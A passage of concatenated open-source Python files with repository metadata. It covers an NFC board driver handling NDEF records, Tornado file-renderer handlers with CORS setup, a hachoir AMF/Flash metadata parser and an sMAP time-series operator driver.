        # invalidated by _updateStatus() when the message disappears.
        self._updateStatus()
        if self._ndefPresent and not self._ndefRead:
            self._ndefRecords = self._getNdefMessageRecords()
            self._ndefRead = True
        return self._ndefRecords

    @ndefRecords.setter
    def ndefRecords(self, records):
        self._updateStatus()
        self._ndefRecords = records
        #Push them to device
        self._setNdefRecords(self._ndefRecords)

    @property
    def version(self):
        # (major, minor) firmware version reported by open().
        return self._version

    def getNfcInfo(self):
        """Return low-level NFC info from the transport."""
        return self._transport.nfcGetInfo()

    def reset(self):
        """Reset the board (without entering the bootloader)."""
        self._transport.reset(False)

    def startPolling(self, readerWriter, emulator, p2p):
        """Start polling in the selected mode(s)."""
        self._transport.nfcPoll(readerWriter, emulator, p2p)

    def stopPolling(self):
        """Stop polling in all modes."""
        self._transport.nfcPoll(False, False, False)

    def ndefRead(self):
        """Kick off an asynchronous NDEF read operation."""
        self._transport.nfcOperation(True, False)

    def ndefWrite(self):
        """Kick off an asynchronous NDEF write operation."""
        self._transport.nfcOperation(False, True)

    def setLeds(self, led1, led2):
        """Set the state of the two on-board LEDs."""
        self._transport.leds(led1, led2)

    def _updateStatus(self):
        # Decode the board's status word into the cached boolean flags.
        status = self._transport.status()
        self._polling = (status & STATUS_POLLING) != 0
        self._connected = (status & STATUS_CONNECTED) != 0
        self._ndefPresent = (status & STATUS_NDEF_PRESENT) != 0
        self._ndefReadable = (status & STATUS_NDEF_READABLE) != 0
        self._ndefWriteable = (status & STATUS_NDEF_WRITEABLE) != 0
        self._ndefBusy = (status & STATUS_NDEF_BUSY) != 0
        self._ndefSuccess = (status & STATUS_NDEF_SUCCESS) != 0
        self._type2 = (status & STATUS_TYPE_MASK) == STATUS_TYPE2
        self._type4 = (status & STATUS_TYPE_MASK) == STATUS_TYPE4
        self._p2p = (status & STATUS_TYPE_MASK) == STATUS_P2P
        self._initiator = (status & STATUS_INITIATOR) != 0
        if not self._ndefPresent:
            # Message gone: drop the cached records.
            self._ndefRead = False
            self._ndefRecords = None

    def _getNdefRecords(self, start, count):
        # Fetch and parse `count` records starting at index `start`.
        records = []
        for recordNumber in range(start, start+count):
            #Get records info
            recordType, recordInfo = self._transport.nfcGetRecordInfo(recordNumber)
            # Record type code -> parser (0 = unknown, skipped).
            funcs = { 0 : self._parseUnknownRecord,
                      1 : self._parseURIRecord,
                      2 : self._parseTextRecord,
                      3 : self._parseSmartPosterRecord,
                      4 : self._parseMIMERecord,
                    }
            record = funcs[recordType](recordNumber, recordInfo)
            if record != None:
                records += [record]
        return records

    def _getNdefMessageRecords(self):
        #Get message count
        recordsCount = self._transport.nfcGetMessageInfo()
        return self._getNdefRecords(0, recordsCount)

    def _parseUnknownRecord(self, recordNumber, recordInfo):
        # Unsupported record types are silently dropped.
        return None

    def _parseURIRecord(self, recordNumber, recordInfo):
        # recordInfo = (prefix code, remaining-URI length).
        uriPrefix = recordInfo[0]
        uriLength = recordInfo[1]
        uri = unicode(self._decodePrefix(uriPrefix).tostring() + self._getRecordData(recordNumber, 0, uriLength).tostring(), "utf-8")
        return URIRecord(uri)

    def _parseTextRecord(self, recordNumber, recordInfo):
        # recordInfo = (encoding flag, language code length, text length).
        encoding = TEXT_ENCODING[recordInfo[0]]
        languageCodeLength = recordInfo[1]
        textLength = recordInfo[2]
        languageCode = unicode(self._getRecordData(recordNumber, 0, languageCodeLength).tostring(), "utf-8")
        text = unicode(self._getRecordData(recordNumber, 1, textLength).tostring(), encoding)
        return TextRecord(text, languageCode, encoding)

    def _parseSmartPosterRecord(self, recordNumber, recordInfo):
        # recordInfo = (index of first sub-record, sub-record count).
        recordsStart = recordInfo[0]
        recordsCount = recordInfo[1]
        records = self._getNdefRecords(recordsStart, recordsCount)
        return SmartPosterRecord(records)

    def _parseMIMERecord(self, recordNumber, recordInfo):
        # recordInfo = (MIME type length, payload length).
        mimeTypeLength = recordInfo[0]
        dataLength = recordInfo[1]
        mimeType = unicode(self._getRecordData(recordNumber, 0, mimeTypeLength).tostring(), "utf-8")
        data = self._getRecordData(recordNumber, 1, dataLength)
        return MIMERecord(mimeType, data)

    def _decodePrefix(self, prefix):
        # Expand a URI prefix code into its byte string (e.g. "http://").
        return self._transport.nfcDecodePrefix(prefix)

    def _getRecordData(self, recordNumber, item, itemLength):
        # Read one record item from the board in CHUNK_SIZE pieces.
        buf = array("B")
        while len(buf) < itemLength:
            chunkLength = min(CHUNK_SIZE, itemLength - len(buf))
            buf += self._transport.nfcGetRecordData(recordNumber, item, len(buf), chunkLength)
        return buf

    def _setNdefRecords(self, records):
        # Two-pass upload: first declare record metadata, then send data.
        self._transport.nfcPrepareMessage(True, False)
        recordNumber = 0
        spRecordNumber = len(records) #Smart poster records after main records
        for record in records:
            spRecordNumber = self._addNdefRecord(recordNumber, record, spRecordNumber)
            recordNumber += 1
        self._transport.nfcSetMessageInfo(recordNumber)
        self._transport.nfcPrepareMessage(False, True)
        recordNumber = 0
        spRecordNumber = len(records)
        for record in records:
            spRecordNumber = self._setNdefRecord(recordNumber, record, spRecordNumber)
            recordNumber += 1
        #self._transport.nfcSetMessageInfo(recordNumber)

    def _addNdefRecord(self, recordNumber, record, recordsStart, spAllowed = True):
        # Declare one record's metadata; dispatch on the record class.
        funcs = { URIRecord : self._generateURIRecord,
                  TextRecord : self._generateTextRecord,
                  SmartPosterRecord : self._generateSmartPosterRecord,
                  MIMERecord : self._generateMIMERecord,
                }
        if( not spAllowed and type(record) == SmartPosterRecord ):
            # Smart posters must not be nested inside smart posters.
            raise SmartPosterNestingException()
        return funcs[type(record)](recordNumber, record, recordsStart)

    def _generateURIRecord(self, recordNumber, record, spRecordNumber):
        #Try to get prefix
        buf = array("B")
        buf.fromstring(record.uri)
        prefix, length = self._encodePrefix(buf[0:36])
        self._transport.nfcSetRecordInfo(recordNumber, 1, [prefix, len(buf[length:])])
        return spRecordNumber

    def _generateTextRecord(self, recordNumber, record, spRecordNumber):
        languageCodeBuf = array("B")
        languageCodeBuf.fromstring(record.language)
        textBuf = array("B")
        textBuf.fromstring(record.text)
        # Reverse-map the codec name back to the encoding flag.
        self._transport.nfcSetRecordInfo(recordNumber, 2, [{v: k for k, v in TEXT_ENCODING.items()}[record.encoding], len(languageCodeBuf), len(textBuf)])
        return spRecordNumber

    def _generateSmartPosterRecord(self, recordNumber, record, recordsStart):
        self._transport.nfcSetRecordInfo(recordNumber, 3, [recordsStart, len(record.records)])
        spRecordNumber = recordsStart
        for spRecord in record.records:
            self._addNdefRecord(spRecordNumber, spRecord, 0, False) #No sub records
            spRecordNumber += 1
        return spRecordNumber

    def _generateMIMERecord(self, recordNumber, record, spRecordNumber):
        mimeTypeBuf = array("B")
        mimeTypeBuf.fromstring(record.mimeType)
        dataBuf = array("B", record.data)
        self._transport.nfcSetRecordInfo(recordNumber, 4, [len(mimeTypeBuf), len(dataBuf)])
        return spRecordNumber

    def _setNdefRecord(self, recordNumber, record, recordsStart, spAllowed = True):
        # Second pass: send record payloads; dispatch on the record class.
        funcs = { URIRecord : self._setURIRecord,
                  TextRecord : self._setTextRecord,
                  SmartPosterRecord : self._setSmartPosterRecord,
                  MIMERecord : self._setMIMERecord,
                }
        if( not spAllowed and type(record) == SmartPosterRecord ):
            raise SmartPosterNestingException()
        return funcs[type(record)](recordNumber, record, recordsStart)

    def _setURIRecord(self, recordNumber, record, spRecordNumber):
        #Try to get prefix
        buf = array("B")
        buf.fromstring(record.uri)
        prefix, length = self._encodePrefix(buf[0:36])
        # Only the part after the encoded prefix is sent as data.
        self._setRecordData(recordNumber, 0, buf[length:])
        return spRecordNumber

    def _setTextRecord(self, recordNumber, record, spRecordNumber):
        languageCodeBuf = array("B")
        languageCodeBuf.fromstring(record.language)
        textBuf = array("B")
        textBuf.fromstring(record.text)
        self._setRecordData(recordNumber, 0, languageCodeBuf)
        self._setRecordData(recordNumber, 1, textBuf)
        return spRecordNumber

    def _setSmartPosterRecord(self, recordNumber, record, recordsStart):
        spRecordNumber = recordsStart
        for spRecord in record.records:
            self._setNdefRecord(spRecordNumber, spRecord, 0, False) #No sub records
            spRecordNumber += 1
        return spRecordNumber

    def _setMIMERecord(self, recordNumber, record, spRecordNumber):
        mimeTypeBuf = array("B")
        mimeTypeBuf.fromstring(record.mimeType)
        dataBuf = array("B", record.data)
        self._setRecordData(recordNumber, 0, mimeTypeBuf)
        self._setRecordData(recordNumber, 1, dataBuf)
        return spRecordNumber

    def _encodePrefix(self, uri):
        # Ask the board which URI prefix code matches; returns the code
        # and the number of bytes it covers.
        prefix, length = self._transport.nfcEncodePrefix(uri)
        return prefix, length

    def _setRecordData(self, recordNumber, item, itemData):
        # Write one record item to the board in CHUNK_SIZE pieces.
        itemLength = len(itemData)
        itemOff = 0
        while itemOff < itemLength:
            chunkLength = min(CHUNK_SIZE, itemLength - itemOff)
            buf = array("B", itemData[itemOff:itemOff+chunkLength])
            self._transport.nfcSetRecordData(recordNumber, item, itemOff, buf)
            itemOff += chunkLength
|
{
"content_hash": "650c5f10749ccbeae43f0adb327cf9a4",
"timestamp": "",
"source": "github",
"line_count": 407,
"max_line_length": 201,
"avg_line_length": 35.1007371007371,
"alnum_prop": 0.6171776564468711,
"repo_name": "jautero/micronfcboard-python",
"id": "00c2f331a596ba4694c566f08a79dbdba9398877",
"size": "14286",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "micronfcboard/board.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "198570"
}
],
"symlink_target": ""
}
|
import os
import pkg_resources
import tornado.gen
import tornado.web
from raven.contrib.tornado import SentryMixin
import waterbutler.core.utils
import waterbutler.server.utils
import waterbutler.core.exceptions
from mfr.core import utils
from mfr.server import settings
from mfr.core import exceptions
# Request headers a browser is allowed to send on cross-origin requests
# (advertised via Access-Control-Allow-Headers).
CORS_ACCEPT_HEADERS = [
    'Range',
    'Content-Type',
    'Authorization',
    'Cache-Control',
    'X-Requested-With',
]

# Response headers exposed to cross-origin JavaScript callers
# (advertised via Access-Control-Expose-Headers).
CORS_EXPOSE_HEADERS = [
    'Accept-Ranges',
    'Content-Range',
    'Content-Length',
    'Content-Encoding',
]
class CorsMixin(tornado.web.RequestHandler):
    """Mixin adding CORS response headers and an OPTIONS preflight handler.

    settings.CORS_ALLOW_ORIGIN may be a single origin string (always
    advertised) or a collection of origins (the request's Origin is echoed
    back only when it is in the collection).
    """

    def set_default_headers(self):
        if isinstance(settings.CORS_ALLOW_ORIGIN, str):
            # single configured origin: always advertise it
            self.set_header('Access-Control-Allow-Origin', settings.CORS_ALLOW_ORIGIN)
        else:
            # whitelist: echo the request's origin back only if allowed
            if self.request.headers.get('Origin') in settings.CORS_ALLOW_ORIGIN:
                self.set_header('Access-Control-Allow-Origin', self.request.headers['Origin'])
        self.set_header('Access-Control-Allow-Headers', ', '.join(CORS_ACCEPT_HEADERS))
        self.set_header('Access-Control-Expose-Headers', ', '.join(CORS_EXPOSE_HEADERS))
        self.set_header('Cache-control', 'no-store, no-cache, must-revalidate, max-age=0')

    def options(self):
        """Answer CORS preflight requests with 204 No Content."""
        self.set_status(204)
        # Fixed: the original line ended in a stray trailing comma, which made
        # this statement a discarded one-element tuple.
        self.set_header('Access-Control-Allow-Methods', 'GET, PUT, POST, DELETE')
class BaseHandler(CorsMixin, tornado.web.RequestHandler, SentryMixin):
    """Common request plumbing for render/export handlers: resolves the
    target file's provider and the cache providers before each request,
    and renders plugin or generic errors."""

    @tornado.gen.coroutine
    def prepare(self):
        if self.request.method == 'OPTIONS':
            # CORS preflight: no provider setup needed
            return

        # The ?url= query parameter identifies the file to render.
        # NOTE(review): a missing 'url' raises KeyError here -- presumably
        # surfaced as a 400 by write_error; confirm intended.
        self.url = self.request.query_arguments['url'][0].decode('utf-8')

        self.provider = utils.make_provider(
            settings.PROVIDER_NAME,
            self.request,
            self.url
        )

        self.metadata = yield from self.provider.metadata()

        # remote cache provider for rendered/exported output
        self.cache_provider = waterbutler.core.utils.make_provider(
            settings.CACHE_PROVIDER_NAME,
            {},  # User information which can be left blank
            settings.CACHE_PROVIDER_CREDENTIALS,
            settings.CACHE_PROVIDER_SETTINGS
        )

        # local filesystem scratch space for downloaded source files
        self.local_cache_provider = waterbutler.core.utils.make_provider(
            'filesystem', {}, {}, settings.LOCAL_CACHE_PROVIDER_SETTINGS
        )

    @tornado.gen.coroutine
    def write_stream(self, stream):
        """Copy *stream* to the client in CHUNK_SIZE pieces, flushing each."""
        while True:
            chunk = yield from stream.read(settings.CHUNK_SIZE)
            if not chunk:
                break
            self.write(chunk)
            yield self.flush()

    def write_error(self, status_code, exc_info):
        """Render an error response; plugin errors carry their own code/HTML."""
        self.captureException(exc_info)  # Log all non 2XX codes to sentry
        etype, exc, _ = exc_info

        if issubclass(etype, exceptions.PluginError):
            self.set_status(exc.code)
            self.finish(exc.as_html())
        else:
            # anything unexpected becomes a generic 400 with a friendly page
            self.set_status(400)
            self.finish('''
                <link rel="stylesheet" href="/static/css/bootstrap.min.css">
                <div class="alert alert-warning" role="alert">
                    Unable to render the requested file, please try again later.
                </div>
            ''')
class ExtensionsStaticFileHandler(tornado.web.StaticFileHandler, CorsMixin):
    """Extensions static path definitions

    Serves static assets bundled with each mfr extension; falls back to the
    server-wide static directory when the extension lookup or read fails.
    """

    def initialize(self):
        namespace = 'mfr.renderers'
        module_path = 'mfr.extensions'
        # map: extension short name -> its installed static/ directory
        self.modules = {
            ep.module_name.replace(module_path + '.', ''): os.path.join(ep.dist.location, 'mfr', 'extensions', ep.module_name.replace(module_path + '.', ''), 'static')
            for ep in list(pkg_resources.iter_entry_points(namespace))
        }

    @tornado.gen.coroutine
    def get(self, module_name, path):
        try:
            # re-point the StaticFileHandler at the requested extension's root
            super().initialize(self.modules[module_name])
            return (yield super().get(path))
        except Exception:
            self.set_status(404)
        try:
            # fall back to the global static directory
            super().initialize(settings.STATIC_PATH)
            return (yield super().get(path))
        except Exception:
            self.set_status(404)
|
{
"content_hash": "fde555fb7df24617860d993a9165d5aa",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 167,
"avg_line_length": 31.7578125,
"alnum_prop": 0.6169741697416974,
"repo_name": "haoyuchen1992/modular-file-renderer",
"id": "160d236a06224617b6d90b76f841be1ad9437d1e",
"size": "4065",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "mfr/server/handlers/core.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "89314"
},
{
"name": "HTML",
"bytes": "28280"
},
{
"name": "Java",
"bytes": "3658258"
},
{
"name": "JavaScript",
"bytes": "938304"
},
{
"name": "Mako",
"bytes": "26171"
},
{
"name": "Python",
"bytes": "119293"
}
],
"symlink_target": ""
}
|
"""
AMF metadata (inside Flash video, FLV file) parser.
Documentation:
- flashticle: Python project to read Flash (formats SWF, FLV and AMF)
http://undefined.org/python/#flashticle
Author: Victor Stinner
Creation date: 4 november 2006
"""
from hachoir_core.field import (FieldSet, ParserError,
UInt8, UInt16, UInt32, PascalString16, Float64)
from hachoir_core.tools import timestampUNIX
def parseUTF8(parent):
    """Yield the UTF-8 Pascal-string field of an AMF string value."""
    yield PascalString16(parent, "value", charset="UTF-8")
def parseDouble(parent):
    """Yield the 64-bit float field of an AMF number value."""
    yield Float64(parent, "value")
def parseBool(parent):
    """Yield the single-byte field of an AMF boolean value."""
    yield UInt8(parent, "value")
def parseArray(parent):
    """Yield the element count, then one AMFObject per array element."""
    yield UInt32(parent, "count")
    element_count = parent["count"].value
    for _ in xrange(element_count):
        yield AMFObject(parent, "item[]")
def parseObjectAttributes(parent):
    """Yield object attributes until the terminating empty-key marker."""
    while True:
        attr = Attribute(parent, "attr[]")
        yield attr
        if attr["key"].value == "":
            break
def parseMixedArray(parent):
    """Yield the count, then at most count+1 attributes, stopping early at an
    empty key (the end-of-array marker)."""
    yield UInt32(parent, "count")
    for _ in xrange(parent["count"].value + 1):
        entry = Attribute(parent, "item[]")
        yield entry
        if not entry['key'].value:
            break
def parseDate(parent):
    """Yield the two raw timestamp components of an AMF date value."""
    yield Float64(parent, "timestamp_microsec")
    yield UInt16(parent, "timestamp_sec")
def parseNothing(parent):
    # Parser for value-less markers (end of object): produce no fields.
    # NOTE(review): raising StopIteration to end the consuming generator is a
    # Python 2 idiom; under PEP 479 (Python 3.7+) it would surface as a
    # RuntimeError.  Fine here -- this codebase targets Python 2 (see xrange
    # use above).
    raise StopIteration()
class AMFObject(FieldSet):
    """One typed AMF value: a type byte followed by a type-specific payload.

    tag_info maps the AMF type byte to a (payload parser, description) pair;
    unknown type bytes abort the parse.
    """
    CODE_DATE = 11
    tag_info = {
        # http://osflash.org/amf/astypes
        0: (parseDouble, "Double"),
        1: (parseBool, "Boolean"),
        2: (parseUTF8, "UTF-8 string"),
        3: (parseObjectAttributes, "Object attributes"),
        #MOVIECLIP = '\x04',
        #NULL = '\x05',
        #UNDEFINED = '\x06',
        #REFERENCE = '\x07',
        8: (parseMixedArray, "Mixed array"),
        9: (parseNothing, "End of object"),
        10: (parseArray, "Array"),
        CODE_DATE: (parseDate, "Date"),
        #LONGUTF8 = '\x0c',
        #UNSUPPORTED = '\x0d',
        ## Server-to-client only
        #RECORDSET = '\x0e',
        #XML = '\x0f',
        #TYPEDOBJECT = '\x10',
    }

    def __init__(self, *args, **kw):
        FieldSet.__init__(self, *args, **kw)
        code = self["type"].value
        try:
            self.parser, desc = self.tag_info[code]
            if code == self.CODE_DATE:
                # dates get a computed value: rebind createValue per-instance
                self.createValue = self.createValueDate
        except KeyError:
            raise ParserError("AMF: Unable to parse type %s" % code)

    def createFields(self):
        # type byte first, then whatever fields the payload parser yields
        yield UInt8(self, "type")
        for field in self.parser(self):
            yield field

    def createValueDate(self):
        # NOTE(review): converts the two raw timestamp fields into a UNIX
        # timestamp (microsec * 0.001 minus sec * 60) -- conversion taken
        # as-is from the original; verify against the AMF date spec.
        value = (self["timestamp_microsec"].value * 0.001) \
            - (self["timestamp_sec"].value * 60)
        return timestampUNIX(value)
class Attribute(AMFObject):
    """A key/value pair inside an AMF object or mixed array: a Pascal-string
    key followed by a typed value."""

    def __init__(self, *args):
        AMFObject.__init__(self, *args)
        self._description = None

    def createFields(self):
        yield PascalString16(self, "key", charset="UTF-8")
        yield UInt8(self, "type")
        for subfield in self.parser(self):
            yield subfield

    def createDescription(self):
        return 'Attribute "%s"' % self["key"].value
|
{
"content_hash": "ac559371bb6dbf5f9065132fdf44a104",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 70,
"avg_line_length": 28.463636363636365,
"alnum_prop": 0.5927818588310444,
"repo_name": "Yukinoshita47/Yuki-Chan-The-Auto-Pentest",
"id": "496c5c1d6c1c7bdb9e6c94edf5a424b364e870af",
"size": "3131",
"binary": false,
"copies": "94",
"ref": "refs/heads/master",
"path": "Module/metagoofil/hachoir_parser/video/amf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "36211"
},
{
"name": "JavaScript",
"bytes": "3038"
},
{
"name": "Makefile",
"bytes": "1360"
},
{
"name": "Perl",
"bytes": "108876"
},
{
"name": "Python",
"bytes": "3034585"
},
{
"name": "Roff",
"bytes": "6738"
},
{
"name": "Ruby",
"bytes": "2693582"
},
{
"name": "Shell",
"bytes": "53755"
},
{
"name": "XSLT",
"bytes": "5475"
}
],
"symlink_target": ""
}
|
"""
Copyright (c) 2011, 2012, Regents of the University of California
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.
"""
"""
@author Stephen Dawson-Haggerty <stevedh@eecs.berkeley.edu>
"""
import uuid
import shelve
import operator
import datetime
import copy
import itertools
import numpy as np
from twisted.internet import reactor, threads
from twisted.python import log
from smap import driver, util, smapconf
from smap.core import SmapException
from smap.archiver.client import SmapClient, RepublishClient
from smap.contrib import dtutil
from twisted.spread import pb
from dateutil.tz import gettz
# Canonical "no data" value: an empty float array shaped (0, 2) so that
# time/value column indexing still works on it.
null = np.empty((0, 2))
def mknull(n):
    """Return an empty float array shaped (0, n): an n-column 'no data' value."""
    return np.empty((0, n))
# Output-construction modes for Operator: collapse all inputs into one derived
# output stream, or produce one output stream per input stream.
OP_N_TO_1 = 1
OP_N_TO_N = 2
class DataChunk(list):
    """List of raw time-series records currently being processed.

    region: (start, end) tuple of timestamps bounding the window.
    first / last: True on the first / final chunk of a series -- lets
    operators initialize or flush internal buffers.
    """

    def __init__(self, region, first, last, *args, **kwargs):
        list.__init__(self, *args, **kwargs)
        self.region = region
        self.first = first
        self.last = last
class Operator(object):
    """Base class for stream operators mapping input time series to outputs.

    ``inputs`` is a list of tag dicts (one per source stream, each carrying a
    'uuid' key).  ``outputs`` is either OP_N_TO_1 / OP_N_TO_N (output ids are
    then derived deterministically via uuid5) or an explicit list of output
    tag dicts.  NOTE: written for Python 2 -- relies on list-returning map()
    and the builtin reduce().
    """
    # data type of operator output
    data_type = ('double', float)
    required_tags = set(['uuid'])
    optional_tags = set([])
    # True when the operator needs a whole window before it can emit
    block_streaming = False

    def __init__(self, inputs,
                 outputs=OP_N_TO_1,
                 tags=None):
        """
        :param inputs: list of uuids the operator examines
        """
        self.inputs = inputs
        self.tags = tags
        self._has_pending = False
        self._pending = [null] * len(inputs)
        uuids = map(operator.itemgetter('uuid'), inputs)

        # auto-construct output ids if requested
        if outputs == OP_N_TO_1:
            # one output: uuid5 folded over all sorted input ids, seeded with
            # the operator name, so the id is stable for a given input set
            self.outputs = [util.dict_all(inputs)]
            self.outputs[0]['uuid'] = reduce(lambda x, y: str(uuid.uuid5(y, x)),
                                             map(uuid.UUID, sorted(uuids)),
                                             self.name)
        elif outputs == OP_N_TO_N:
            # one output per input: uuid5(input_uuid, operator name)
            self.outputs = copy.deepcopy(inputs)
            for i, uid in enumerate(map(lambda x: str(uuid.uuid5(x, self.name)),
                                        map(uuid.UUID, uuids))):
                self.outputs[i]['uuid'] = uid
        else:
            # caller supplied explicit output tag dicts
            self.outputs = copy.deepcopy(outputs)

    def index(self, streamid):
        # Position of streamid within self.inputs, or None if unknown.
        for i in xrange(0, len(self.inputs)):
            if self.inputs[i]['uuid'] == streamid:
                return i
        return None

    # @name.setter
    # def _get_name(self):
    #     """Return a stringified name for the operator"""
    #     if self._name:
    #         raise NotImplementedError()
    #     else:
    #         return self._name
    # @name.

    def __call__(self, input, **kwargs):
        # Wrap bare data in a DataChunk so process() sees a uniform type.
        if not isinstance(input, DataChunk):
            input = DataChunk((None, None), False, False, input)
        return self.process(input, **kwargs)

    def reset(self):
        """Reset the internal state to discard any changes made"""
        raise NotImplementedError()

    def process(self, recs):
        """Process a number of records in bulk

        :param list recs: a list of (timestamp, value) tuples
        :return list: a list of (timestamp, value) """
        raise NotImplementedError()

    def _push(self, stream, data, stream_idx=None):
        """Insert data for a single stream"""
        # NOTE(review): falsy test means an explicit stream_idx of 0 falls
        # back to a lookup by stream id; "is None" would be stricter.
        if not stream_idx: stream_idx = self.index(stream)
        self._pending[stream_idx] = data
        self._has_pending = True

    def _process(self):
        """Deliver all waiting data."""
        if self._has_pending:
            rv = self.process(self._pending)
            # reset the pending buffers after delivery
            self._pending = [null] * len(self.inputs)
            self._has_pending = False
            return rv
        else:
            return [null] * len(self.inputs)

    def __str__(self):
        return self.name
class OperatorDriver(driver.SmapDriver):
    """Base class for code which wants to process single streams.

    To do this you should:

     a) implement an :py:class:`Operator`, which contains your
        specific logic.  You should at least override name() to provide
        a human-readable name for your operator, and bulk() which
        processes chunks of data.
     b) subclass OperatorDriver, implementing a "setup" method which
        creates operators and adds them using :py:method:`add_operator`.
        Make sure you call OperatorDriver.setup.

    If you do this, you'll be able to use your operator both in
    real-time mode (via a twistd smap source) and to run on historical
    data, using `smap-load` to load source data and pipe it through
    operators.
    """
    # number of stream uuids fetched per archiver request when loading history
    load_xsec_size = 200

    def add_operator(self, path, op, inherit_metadata=False):
        """Add an operator to the driver: create its output timeseries and
        index it under each of its input stream uuids."""
        if len(op.outputs) != 1 or not 'Properties/UnitofMeasure' in op.outputs[0]:
            raise SmapException("Can only add operators with a single output!")
        opid = op.outputs[0]['uuid']
        unit = op.outputs[0]['Properties/UnitofMeasure']
        if not isinstance(opid, uuid.UUID):
            opid = uuid.UUID(opid)

        self.add_timeseries(path, opid, unit,
                            data_type=op.data_type[0],
                            milliseconds=False)
        # record provenance: which source streams and which operator
        self.set_metadata(path, {
            'Extra/SourceStream' : \
                ','.join(map(operator.itemgetter('uuid'), op.inputs)),
            'Extra/Operator' : str(op.name)
            })
        if inherit_metadata:
            self.set_metadata(path, op.outputs[0])

        # index the operator by every input uuid so _data can route to it
        for source in op.inputs:
            source = source['uuid']
            if not source in self.operators:
                self.operators[source] = {}
            if not opid in self.operators[source]:
                self.operators[source][opid] = (path, op)
        self.oplist.append((path, op))

    def reset(self):
        """Reset all operators"""
        for oplist in self.operators.itervalues():
            for path, op in oplist.itervalues():
                op.reset()

    def _data(self, uuids, newdata, process=True):
        """Process incoming data by pushing it through the operators

        process: don't actually process the operators, just add the
          pending data.
        """
        # print "_data", len(newdata)
        pushlist = set([])
        for source_id, data in zip(uuids, newdata):
            if not source_id in self.operators:
                continue

            # prepare the data
            if len(data) == 0:
                data = np.reshape(data, (0, 2))

            # push all data through the appropriate operators
            for addpath, op in self.operators[source_id].itervalues():
                op._push(source_id, data)
                pushlist.add((addpath, op))
        if not process: return

        # process deterministically, ordered by output path
        pushlist = list(pushlist)
        pushlist.sort(key=lambda x: x[0])
        for addpath, op in pushlist:
            new = op._process()
            for newv in new[0]:
                # incoming timestamps are ms; add_timeseries was registered
                # with milliseconds=False, so convert to seconds here
                ts, v = int(newv[0]), op.data_type[1](newv[1])
                self._add(addpath, ts / 1000, v)

    def setup(self, opts, restrict=None, shelveoperators=False, cache=True, raw=False):
        self.load_chunk_size = datetime.timedelta(hours=int(opts.get('ChunkSize', 24)))
        self.source_url = opts.get('SourceUrl', 'http://new.openbms.org/backend')
        # self.source_url = opts.get('SourceUrl', 'http://ar1.openbms.org:8079')
        if not raw and restrict:
            # exclude streams that are themselves operator outputs to avoid
            # feeding operators with their own results
            self.restrict = '(' + restrict + ') and not has Metadata/Extra/Operator'
        else:
            self.restrict = restrict
        if shelveoperators:
            # persist operator state on disk across restarts
            self.operators = shelve.open(opts.get('OperatorCache', '.operators'),
                                         protocol=2, writeback=True)
            # sync the operator state periodically and at exit
            util.periodicCallInThread(self.operators.sync).start(60)
            reactor.addSystemEventTrigger('after', 'shutdown',
                                          self.operators.close)
        else:
            self.operators = {}
        self.oplist = []
        self.arclient = SmapClient(self.source_url)
        self.cache = cache

        # create timeseries from cached operator state
        for sid, oplist in self.operators.iteritems():
            for path, op in oplist.itervalues():
                self.add_operator(path, op)

    def start(self):
        """Start receiving real-time data when used in daemon mode"""
        # set up clients to provide the data
        source = [
            'http://ar1.openbms.org:8079',
            'http://ar2.openbms.org:8079']

        self.clients = []
        for url in source:
            self.clients.append(RepublishClient(url, self._data,
                                                restrict=self.restrict))
            self.clients[-1].connect()

    def load(self, start_dt, end_dt, cache=True):
        """Load a range of time by pulling it from the database and
        pushing it through the operators"""
        self.load_uids = self.operators.keys()
        self.start_dt, self.end_dt = start_dt, end_dt
        self.cache = cache
        return self.load_time_chunk(self)

    def load_time_chunk(self, *args):
        # advance one load_chunk_size window; stop once past end_dt
        if self.start_dt >= self.end_dt:
            return None
        self.load_offset = 0
        return self.load_crossection()

    def load_crossection(self, *args):
        # fetch the next load_xsec_size uuids for the current time window
        start = self.start_dt
        end = self.start_dt + self.load_chunk_size
        if end > self.end_dt: end = self.end_dt

        log.msg("loading " + str(self.load_offset) + " " +
                str(start) + ' - ' + str(end))

        start, end = dtutil.dt2ts(start), \
            dtutil.dt2ts(end)
        d = threads.deferToThread(self.arclient.data_uuid,
                                  self.load_uids[self.load_offset:
                                                 self.load_offset +
                                                 self.load_xsec_size],
                                  start, end,
                                  self.cache)
        d.addCallback(self.load_data, self.load_offset)
        d.addCallback(lambda _: (self._flush(), None))

        # chain the next cross-section, or move to the next time window once
        # all uuids in this window are done
        self.load_offset += self.load_xsec_size
        if self.load_offset >= len(self.load_uids):
            # pick a new window
            self.start_dt += self.load_chunk_size
            d.addCallback(self.load_time_chunk)
        else:
            d.addCallback(self.load_crossection)
        def err(e):
            print e
        d.addErrback(err)
        return d

    def load_data(self, data, offset):
        # deliver one cross-section of archived data to the operators
        uuids = self.load_uids[offset:offset+self.load_xsec_size]
